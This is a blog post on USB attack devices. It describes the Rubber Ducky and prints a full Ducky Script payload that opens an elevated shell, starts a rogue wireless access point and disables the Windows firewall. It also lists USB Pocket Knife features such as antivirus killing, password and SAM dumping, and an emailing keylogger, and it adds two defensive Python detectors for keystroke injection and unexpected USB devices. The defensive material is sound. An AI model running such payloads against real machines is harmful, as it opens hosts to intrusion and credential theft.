12.5.13

USB hacking

Physical access to a machine can always pose a security problem. Not because of theft of the equipment, but because someone could deliberately, for example, plug in a USB device and install malware, or exploit a 0-day vulnerability in the operating system to run remote code and obtain a shell with administrator permissions.
Today's post is not about exploiting a vulnerability, but about projects devoted to "USB hacking".
Don't think these USB devices are large and will be spotted right away: the devices used for this are small, and some even have SD card support.
USB Rubber Ducky
As you can see, the device is quite small and also has SD card support.
What projects exist?
The newest to date is Rubber Ducky; you can find information about it on Google Code.
The project has the following features:
  • Firmware to Support Windows, Linux, Mac OS X, Android & IOS
  • Firmware to Support OSX only! (by demand)
  • Firmware to Support Mass Storage (acts like USB Drive)
  • Firmware to Support Multiple Payloads in HID mode
  • New Firmware Composite Device; Mass Storage & Keyboard (Button triggers Keyboard) Language Independent
  • New Feature Version 2 firmware supports easy VID & PID manipulation through binary file vidpid.bin.
Operating Systems Supported:
  • Windows
  • Unix (Linux, Solaris, BSD)
  • OSX
  • Android
  • IOS
Multiple HID Language Support
  • US (United States)
  • UK (United Kingdom)
  • DE (German)
  • DA (Danish)
  • FR (French)
  • BE (Belgian)
  • NO (Norwegian)
  • PT (Portuguese)
  • SV (Swedish)
  • RU (Russian) (testing)
Script(s) to reverse Hak5 Ducky Binaries (inject.bin files) into their ducky script form.
  • Currently Supports En-US and En-GB Languages
We can also create different payloads according to our needs. There is a page that generates some of them for us.
Rubber Ducky payloads
An example for Windows 7:
REM Author: Darren Kitchen
REM Target: Windows 7
REM Description: Create a Wireless AP and disable firewall.
DELAY 2000
CONTROL ESCAPE
DELAY 200
STRING cmd
DELAY 200
MENU
DELAY 100
STRING a
DELAY 100
LEFTARROW
ENTER
DELAY 200
STRING netsh wlan set hostednetwork mode=allow ssid=Seifreed key=CLAVE
ENTER
DELAY 100
STRING netsh wlan start hostednetwork
ENTER
DELAY 100
STRING netsh firewall set opmode disable
ENTER
STRING exit
ENTER
In this case the user would connect to the access point and the firewall would be left disabled.
QUACK
You can contribute your own PAYLOAD if you want :D
Another interesting USB hacking project is USB Pocket Knife.
The project is very ambitious and has very good features; the details:
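A Rubber Ducky is, to the host, just a keyboard: every line of the script above becomes keystrokes delivered at a fixed, very short interval. That timing is the signal a defender can use. The following detector is an added example, not code from the original post or from the Rubber Ducky project; it assumes a host auditing agent that records each key-down event as a line "<ms-timestamp> <keyname>" (a constructed format), and the 30 ms / 8-key thresholds are assumptions chosen so that normal typing never trips them.

```python
"""Keystroke-injection detector for the kind of HID attack a Rubber Ducky performs.

Added example; not code from the original post or from the Rubber Ducky project.
Assumption: a host auditing agent records every key-down event as a line
"<ms-timestamp> <keyname>" (constructed format). Thresholds are assumptions:
sustained gaps under ~30 ms between keys are far below human typing speed,
while a scripted device types at a fixed, tiny interval.
"""
from dataclasses import dataclass
from statistics import mean
from typing import List, Tuple

INJECTION_MAX_GAP_MS = 30  # assumption: no human sustains gaps this short
MIN_BURST_KEYS = 8         # assumption: ignore short accidental fast runs


@dataclass
class Burst:
    start_ms: int
    end_ms: int
    keys: int
    mean_gap_ms: float


def parse_events(log: str) -> List[Tuple[int, str]]:
    """Parse '<ms> <key>' lines into (timestamp, key) pairs sorted by time."""
    events = []
    for line in log.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        ts, key = line.split(maxsplit=1)
        events.append((int(ts), key))
    return sorted(events)


def find_bursts(events, max_gap_ms=INJECTION_MAX_GAP_MS,
                min_keys=MIN_BURST_KEYS) -> List[Burst]:
    """Return runs of at least min_keys events whose every inter-key gap is <= max_gap_ms."""
    bursts: List[Burst] = []
    run_start = 0
    for i in range(1, len(events) + 1):
        # A run ends at the first gap wider than the threshold, or at the end of the log.
        if i == len(events) or events[i][0] - events[i - 1][0] > max_gap_ms:
            run = events[run_start:i]
            if len(run) >= min_keys:
                gaps = [b[0] - a[0] for a, b in zip(run, run[1:])]
                bursts.append(Burst(run[0][0], run[-1][0], len(run), mean(gaps)))
            run_start = i
    return bursts


def constructed_sample_log() -> str:
    """Constructed log: a human typing at ~150 ms per key, then a scripted burst
    (the netsh line from the payload above) typed at 10 ms per key."""
    lines, t = ["# ms key   (constructed sample)"], 1000
    for ch in "hello world":
        lines.append(f"{t} {'SPACE' if ch == ' ' else ch}")
        t += 150
    t += 4000  # pause before the device starts typing
    for ch in "netsh firewall set opmode disable":
        lines.append(f"{t} {'SPACE' if ch == ' ' else ch}")
        t += 10
    lines.append(f"{t} ENTER")
    return "\n".join(lines)


if __name__ == "__main__":
    for b in find_bursts(parse_events(constructed_sample_log())):
        print(f"injection-like burst: {b.keys} keys from {b.start_ms} to {b.end_ms} ms, "
              f"mean gap {b.mean_gap_ms:.1f} ms")
```

On a real host the timestamps would come from the input subsystem (evdev on Linux, a low-level keyboard hook on Windows); the detector is deliberately simple so it can run inline in such an agent. Note that a scripted device can add DELAY between keys to fall under the threshold, so timing is one signal to combine with device enumeration policy, not a complete defence.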
Key:
- Non-U3 Drives Only
- U3 Drives only
- Not yet Implemented
- Everything Else
Features:
- Upon insertion, the first option in the Autorun dialog box starts the payload, while appearing only to open the drive.
- Full silent autorun with no user interaction for U3 drives.
- A “Menu.bat” is included to manage all special functions, modules, and features of the switchblade.
- Payload checks the root of the C: drive and prevents the payload from running if the file “Safety.txt” is found.
- Includes TightVNC viewer so you always have it with you.
- Includes Notepad++ for easy batch editing.
- Includes antidote batch files for Nmap, the Hacksaw, and VNC.
- Fully commented code and fully featured ReadMe with instructions on setting up the payload for your needs.
- A custom backup and restore script, which automatically restores the switchblade (to the last time it was backed up) before every run. This ensures the payload is always put back to a normal state, even after it’s been nuked by an antivirus.
- A custom auto-update script that goes out and downloads the most recent versions of many of the tools used on the switchblade (pwdump, nircmd, etc). Simply run it from Menu.bat, and the tools will be downloaded, extracted, and installed into the payload. The backup archive for the entire payload will also be updated to keep the latest versions of the files from being overwritten by an old backup. *working on a way to get this working for U3 drives.
- Auto Compress logs as they are generated to save space
- Email logs Back to yourself
- Optional auto-repack of executable to circumvent AV detection
Payload Components:
- Runs AVKill (csrss.exe)
- Restores the payload to the last backup point
- Disables the Windows Firewall Silently
- Hides Hidden and System Files
- Enables the Remote Desktop service
- Dumps general System Info
- Dumps the SAM
- Dumps LSA secrets
- Dumps LSA secrets via an alternate method (less detectable, not as pretty)
- Dumps Network Passwords
- Dump messenger passwords
- Dump IE passwords.
- Dump saved wireless keys
- Dump URL history
- Dump Firefox passwords (Supports Firefox 3)
- Dump Cache Passwords
- Dump Current Network Services
- Generic Port Scanning
- Dumps current external IP
- Dumps email, messenger, and general website passwords
- Dumps currently installed hot fixes and IE history
- Dumps Google Chrome passwords
- Installs Hacksaw the usual way
- Installs WinVNC client.
- Installs Nmap as a service (emails you results like the Hacksaw)
- Installs a keylogger which emails its logs off to you daily [Broken!]
- File slurping for logs, chat-logs, downloads, bookmarks, etc. (smaller files)
- File slurping for various Documents and Media folders. (larger files)
- Opens an explorer window to the Documents folder when finished
- Automatic update script to keep various executables up to date.
- Compress logs as they are generated to save space.
- Optionally email logs in addition to storing them on the switchblade.
- Management interface to manage the various functions of the pocket Knife.
- Ability to save up to 3 configuration profiles [New!]
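Both projects rely on the host accepting whatever the stick claims to be: the Rubber Ducky enumerates as a keyboard (or, with the composite firmware, as keyboard plus mass storage, and version 2 lets the operator set any VID and PID through vidpid.bin), while the Pocket Knife is a mass-storage device whose payload starts through autorun. A host-side enumeration policy is the natural control. The following check is an added example, not code from the original post or from either project; it assumes an agent that reports each attached device's ids, serial and interface (class, subclass, protocol) triples in the constructed line format shown, and the allow-list entries and finding names are assumptions.

```python
"""USB enumeration policy check for new HID and mass-storage devices.

Added example; not code from the original post, the Rubber Ducky project or
USB Pocket Knife. Assumption: a host agent reports each attached device as a
constructed line "vid:pid serial class:sub:proto[,class:sub:proto...]".
The allow-list below is made up.
"""
from dataclasses import dataclass
from typing import List, Tuple

HID_CLASS = 0x03           # USB HID interface class (keyboards, mice)
MASS_STORAGE_CLASS = 0x08  # USB mass storage interface class


@dataclass
class UsbDevice:
    vid: int
    pid: int
    serial: str
    interfaces: List[Tuple[int, int, int]]  # (class, subclass, protocol) per interface

    def label(self) -> str:
        return f"{self.vid:04x}:{self.pid:04x}/{self.serial}"

    def has_class(self, cls: int) -> bool:
        return any(iface[0] == cls for iface in self.interfaces)


# Constructed allow-list: the keyboards this host is expected to have (ids and serial made up).
ALLOWED_HID = {(0x046D, 0xC31C, "SN-EXAMPLE-001")}


def parse_inventory(text: str) -> List[UsbDevice]:
    """Parse the constructed 'vid:pid serial class:sub:proto,...' lines."""
    devices = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        ids, serial, ifaces = line.split()
        vid, pid = (int(x, 16) for x in ids.split(":"))
        triples = [tuple(int(p, 16) for p in i.split(":")) for i in ifaces.split(",")]
        devices.append(UsbDevice(vid, pid, serial, triples))
    return devices


def evaluate(devices: List[UsbDevice]) -> List[Tuple[str, str]]:
    """Return (device label, finding) pairs for the policy below."""
    findings = []
    for d in devices:
        hid = d.has_class(HID_CLASS)
        storage = d.has_class(MASS_STORAGE_CLASS)
        if hid and storage:
            # Keyboard plus drive in one device is the composite profile described above.
            findings.append((d.label(), "composite-hid-and-storage"))
        if hid and (d.vid, d.pid, d.serial) not in ALLOWED_HID:
            findings.append((d.label(), "unlisted-hid-device"))
        elif hid:
            # Ids match, but VID/PID and serial are firmware-settable, so record it rather than trust it.
            findings.append((d.label(), "allowed-hid-device"))
        if storage and not hid:
            findings.append((d.label(), "mass-storage"))
    return findings


# Constructed inventory: the expected keyboard, a composite keyboard+drive, a second
# keyboard with the allowed VID:PID but a different serial, and a plain flash drive.
SAMPLE_INVENTORY = """\
# vid:pid  serial  iface-class:subclass:protocol[,...]   (constructed)
046d:c31c SN-EXAMPLE-001 03:01:01
f055:0001 - 03:01:01,08:06:50
046d:c31c SN-OTHER-999 03:01:01
0781:5567 4C530001230503 08:06:50
"""

if __name__ == "__main__":
    for label, finding in evaluate(parse_inventory(SAMPLE_INVENTORY)):
        print(f"{label}: {finding}")
```

The point of the third sample device is that an allow-list keyed on VID:PID alone would accept it; checking the serial and the interface classes raises the bar, but since the firmware can set those ids too, a new HID interface should always be logged and, on sensitive hosts, blocked until a person confirms it (USBGuard implements this kind of rule on Linux). Disabling autorun for removable drives removes the trigger the Pocket Knife depends on.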


USB hacking is not out of fashion, and with a good suite installed it can wreak havoc.
